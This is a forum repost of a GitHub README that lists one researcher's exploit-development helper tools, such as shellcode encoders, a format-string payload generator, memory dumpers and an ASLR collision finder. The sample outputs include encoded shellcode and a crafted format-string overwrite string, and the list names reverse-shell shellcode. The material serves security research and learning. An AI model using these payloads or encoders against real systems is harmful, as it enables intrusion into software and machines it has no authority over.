Jump to content
Nytro

Exploit-Development-Tools

Recommended Posts

Posted

Exploit-Development-Tools

A bunch of my exploit development helper tools, that I've developed over time and used, collected in one place. Gathered mostly from my (gists) and/or HDD.


Tools of trade:

  • expdevBadChars - This is a Bad Characters highlighter intended to be used for exploit development purposes. It supports multiple input formats and is able to effectively convert from regex-matching format to the byte array.

    This makes this tool useful while we have for instance shellcode encoded as a Python string concatenation sequence and we want to quickly compare it with the OllyDbg memory that we just dumped (either in textual, printable form or in raw hex binary bytes).

    For more informations, go to: expdevBadChars

  • ascii-shellcode-encoder.py - ASCII Shellcode encoder for Exploit Development purposes, utilizing Jon Erickson's substract arguments finding algorithm. (Gist)

    Example output:

        [*] Input buffer size: 32 bytes.
        [+] SHELLCODE ENCODED PROPERLY. Resulted length: 207 bytes
        
        --------------------------------------------------------------------------------
        %JMNU%521*TX-fMUU-fKUU-jPUUP\%JMNU%521*-bb3b-b060-t2C2-SSSSP-5qv7-0g7g-*b0b-7777P-PB0v-mmmm-v6vp-L8KaP-vvrv-4v0v-1K-w-ffffP-nn5n-uu*p-gf1t-iiiiP-VVVn-MmMM-StrS-Duv6P-%9Hx-0Bfk-84fz-ffffP-UUUU-gyUU-uzqq-xwkNP
        --------------------------------------------------------------------------------
        
        [+] HEX FORM:
        254a4d4e55253532312a54582d664d55552d664b55552d6a505555505c254a4d4e55253532312a2d626233622d623036302d743243322d53535353502d357176372d306737672d2a6230622d37373737502d504230762d6d6d6d6d2d763676702d4c384b61502d767672762d347630762d314b2d772d66666666502d6e6e356e2d75752a702d676631742d69696969502d5656566e2d4d6d4d4d2d537472532d44757636502d253948782d3042666b2d3834667a2d66666666502d555555552d677955552d757a71712d78776b4e50
        
        [+] ESCAPED-HEX FORM:
        \x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x54\x58\x2d\x66\x4d\x55\x55\x2d\x66\x4b\x55\x55\x2d\x6a\x50\x55\x55\x50\x5c\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x62\x62\x33\x62\x2d\x62\x30\x36\x30\x2d\x74\x32\x43\x32\x2d\x53\x53\x53\x53\x50\x2d\x35\x71\x76\x37\x2d\x30\x67\x37\x67\x2d\x2a\x62\x30\x62\x2d\x37\x37\x37\x37\x50\x2d\x50\x42\x30\x76\x2d\x6d\x6d\x6d\x6d\x2d\x76\x36\x76\x70\x2d\x4c\x38\x4b\x61\x50\x2d\x76\x76\x72\x76\x2d\x34\x76\x30\x76\x2d\x31\x4b\x2d\x77\x2d\x66\x66\x66\x66\x50\x2d\x6e\x6e\x35\x6e\x2d\x75\x75\x2a\x70\x2d\x67\x66\x31\x74\x2d\x69\x69\x69\x69\x50\x2d\x56\x56\x56\x6e\x2d\x4d\x6d\x4d\x4d\x2d\x53\x74\x72\x53\x2d\x44\x75\x76\x36\x50\x2d\x25\x39\x48\x78\x2d\x30\x42\x66\x6b\x2d\x38\x34\x66\x7a\x2d\x66\x66\x66\x66\x50\x2d\x55\x55\x55\x55\x2d\x67\x79\x55\x55\x2d\x75\x7a\x71\x71\x2d\x78\x77\x6b\x4e\x50
        
        [+] PYTHON COMPACT SEXY FORM:
        	shellcode += r"%JMNU%521*TX-fMUU-fK"
        	shellcode += r"UU-jPUUP\%JMNU%521*-"
        	shellcode += r"bb3b-b060-t2C2-SSSSP"
        	shellcode += r"-5qv7-0g7g-*b0b-7777"
        	shellcode += r"P-PB0v-mmmm-v6vp-L8K"
        	shellcode += r"aP-vvrv-4v0v-1K-w-ff"
        	shellcode += r"ffP-nn5n-uu*p-gf1t-i"
        	shellcode += r"iiiP-VVVn-MmMM-StrS-"
        	shellcode += r"Duv6P-%9Hx-0Bfk-84fz"
        	shellcode += r"-ffffP-UUUU-gyUU-uzq"
        	shellcode += r"q-xwkNP"
    

    It is possible also to generate list of SUB instructions to compute only one DWORD:

        kali $ ./ascii-shellcode-encoder.py 0x1688
        [*] Input buffer size: 4 bytes.
        [+] SHELLCODE ENCODED PROPERLY. Resulted length: 21 bytes
        
        --------------------------------------------------------------------------------
        -A777-i%%%-r2II-\ZZZP
        --------------------------------------------------------------------------------
        
        [+] HEX FORM:
        2d413737372d692525252d723249492d5c5a5a5a50
        
        [+] ESCAPED-HEX FORM:
        \x2d\x41\x37\x37\x37\x2d\x69\x25\x25\x25\x2d\x72\x32\x49\x49\x2d\x5c\x5a\x5a\x5a\x50
        
        [+] PYTHON COMPACT SEXY FORM:
        	shellcode += r"-A777-i%%%-r2II-\ZZZ"
        	shellcode += r"P"
    
  • format_string_vuln_gen.py - Format String vulnerability input generator to be used during exploit development stage at constructing stable x86 (32bit) input vectors. (Gist)

    Example usage scenario - Using Format String vulnerability, we want to overwrite two DWORDs at specified addresses with some specific values:

    root# ./gen_format_string.py 0xbffff50c,0xbffff514 14 $'\x90\x31\xe6\xb7' $'\x24\x3a\xf8\xb7' -n 1
          
        .:: x86/32bit Format string generator ::.
        - by mgeeky, 2016, v0.3a
         
        [>] Addresses to overwrite: ['0xbffff50c', '0xbffff514']
        (...)
        Resulted format string to use (116 bytes long / 0x74) padded in front with 1 dots to mimic offset:
        
        $'.\x0c\xf5\xff\xbf\x0e\xf5\xff\xbf\x14\xf5\xff\xbf\x16\xf5\xff\xbf%12671x%14$hn%34390x%15$hn%33342x%16$hn%32212x%17$hn'
    
  • lindump - simple process memory dumping utility based on ptrace

        :: lindump v0.1
        Simple Linux process memory dumping utility based on ptrace
        Mariusz B., '16
        
        Usage: lindump [options] <pid> [start [stop|Llen]]
        
        Arguments:
        	<pid>	Process ID
        	start	Dumping start address, may be 0x for hex, or not for dec.
        	stop	Upper address to reach while dumping.
        		When preceded with letter 'L' stands for length
        	Llen	Specifies number of bytes to dump. Also may be preceded with 0x (e.g. L0x10)
        
        Options:
        	-o	Memory dumps output directory (stdout hexdump otherwise, '-' for stdout)
        	-f	Force dumping of unreadable or inaccessible regions (still not a brute force)
        	-v	Verbose output.
        	-h	This cruft
    
  • dlresolve - dynamic symbol resolve utility useful while in need of obtainin symbol's address and it's offset relative to the libc's base (handy while crafting ASLR exploits)

        ./dlresolve system
        [+] libc comes from:		/lib/x86_64-linux-gnu/libc-2.19.so
        [+] libc loaded at:		0x7f44e2b24000
        [+] system located at:		0x7f44e2b65490
        [+] Offset from libc base:	0x00041490
    
  • python_memory_dump.py - Example of dumping memory from within Python's code, using ctypes.c_byte.from_address (Gist)

    Example usage:

        $ ./python_memory_dump.py 
        Hex dump from 0x000055b92c7c2000
        0000 | 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00  | .ELF............
        0010 | 03 00 3e 00 01 00 00 00 10 42 0d 00 00 00 00 00  | ..>......B......
        0020 | 40 00 00 00 00 00 00 00 38 4c 39 00 00 00 00 00  | @.......8.9.....
        0030 | 00 00 00 00 40 00 38 00 09 00 40 00 1e 00 1d 00  | ....@.8...@.....
        0040 | 06 00 00 00 05 00 00 00 40 00 00 00 00 00 00 00  | ........@.......
        0050 | 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00  | @.......@.......
        0060 | 08 01 00 00 00 00 00 00 08 01 00 00 00 00 00 00  | ................
        0070 | 08 00 00 00 00 00 00 00 03 00 00 00 04 00 00 00  | ................
        0080 | 38 02 00 00 00 00 00 00 38 02 00 00 00 00 00 00  | 8.......8.......
        0090 | 38 02 00 00 00 00 00 00 1c 00 00 00 00 00 00 00  | 8...............
        00a0 | 1c 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00  | ................
        00b0 | 01 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00  | ................
        00c0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  | ................
        00d0 | 0c 2d 32 00 00 00 00 00 0c 2d 32 00 00 00 00 00  | .-2......-2.....
        00e0 | 00 00 20 00 00 00 00 00 01 00 00 00 06 00 00 00  | .. .............
        00f0 | 38 39 32 00 00 00 00 00 38 39 52 00 00 00 00 00  | .92......9R.....
    
  • kernel_dump_seh.wds - Windbg script that dumps Structured Exception Handlers linked-list from Kernel Mode KPCR structure. Useful while working on Kernel-Mode SEH-based exploitation. (Gist) Example output:

     	0: kd> $$><C:\Users\ieuser\Desktop\dump_seh.wds
     	KPCR. = 0x8293dc00
     	KPCR.NtTib.ExceptionList = 0x829371ec
    
     	SEH[00]: Next: 0x82937254, Handler: 0x828d36f0
     	SEH[01]: Next: 0x82937ad4, Handler: 0x828d36f0
     	SEH[02]: Next: 0x82937c04, Handler: 0x828d36f0
     	SEH[03]: Next: 0x9a1092e4, Handler: 0x828d36f0
     	SEH[04]: Next: 0x9a1093ec, Handler: 0x828d36f0
     	SEH[05]: Next: 0x9a109a34, Handler: 0x8288aad6
     	SEH[06]: Next: 0x9a109b3c, Handler: 0x828d36f0
     	SEH[07]: Next: 0x9a10a184, Handler: 0x8288aad6
     	SEH[08]: Next: 0x9a10a28c, Handler: 0x828d36f0
     	SEH[09]: Next: 0x9a10a8d4, Handler: 0x8288aad6
     	SEH[10]: Next: 0x9a10a9dc, Handler: 0x828d36f0
     	SEH[11]: Next: 0x9a10b024, Handler: 0x8288aad6
     	SEH[12]: Next: 0x9a10b12c, Handler: 0x828d36f0
     	SEH[13]: Next: 0x9a10b76c, Handler: 0x8288aad6
     	SEH[14]: Next: 0x9a10bac0, Handler: 0x828d36f0
     	SEH[15]: Next: 0x35724134, Handler: 0x41367241
     		^-- Broken Handler.
    
  • printable.sh - One liner determining whether Metasploit's msfpescan's output addresses are printable (contain only ascii characters) or not. (Gist)

  • pexpect-interactive.py - Basic Python's pexpect usage routines in interactive process invocation. Especially handy when it comes to heap-overflow or Use-After-Free exploits, since such process interaction in python may be cumbersome without proper process I/O primitives. (Gist)

  • request2size.c - Simple utility calculating some basic heap chunk's characteristics like chunk size, bin index and it's range - according to original Doug Lea's heap allocator implementation. Useful while grasping Heap Overflow binning conditions. (Gist)

  • find-aslr-collision.sh - Find ASLR collision bash one-liner. (Gist) For the record:

    • x86 ( Linux protostar 2.6.32-5-686 #1 SMP Mon Oct 3 04:15:24 UTC 2011 i686 GNU/Linux) ASLR collision found after: 903 re-launch. (it takes no more than couple of seconds )

    • x86_64 ( Linux work 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux ) ASLR collision found after: 304610 re-launch. (it took roughly 16 minutes )

  • findInstr.sh - Ultra simple Assembly instruction grepper rolling byte-by-byte within target's .text section - to be used while looking for trampoline address for ROP/Exploit (Gist)

  • bin2shellcode.py - Binary blob to C-array simple converting script. Useful when embedding compiled binary shellcode within C program. (Gist)

  • execve.c - Example of simple execve("/bin/sh", ...) shellcode, embedded in C program. (Gist)

  • memory-occupied-by-process.sh - Bash oneliner counting number of bytes occupied by chosen (by PID) process. It works by iterating /proc/$PID/maps file, then computing each memory region range size, then adding it together. Kinda slow though. Worth to mention - it is terribly bad at performance, having written this oneliner I realized we can use /proc/$PID/smaps to obtain the same result much faster. (Gist)

  • shellc2bin.py - Shellcode 2 binary script that reads C-formatted array from Windows clipboard and converts it to binary output written to desired file. (Gist)

  • encshell.py - x86 Shellcode XOR-based encoder intended to do away forbidden chars. Came handy to me several times :-) (Gist)

  • shellcode_win32_netw_active.asm - Win32/x86 Reverse-Shell Shellcode written by hand, with dynamic API resolution.

  • shellcode_win32_spawn_cmd.asm - Win32/x86 Spawn CMD shellcode with dynamic API resolution.

 

Sursa: https://github.com/mgeeky/Exploit-Development-Tools

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...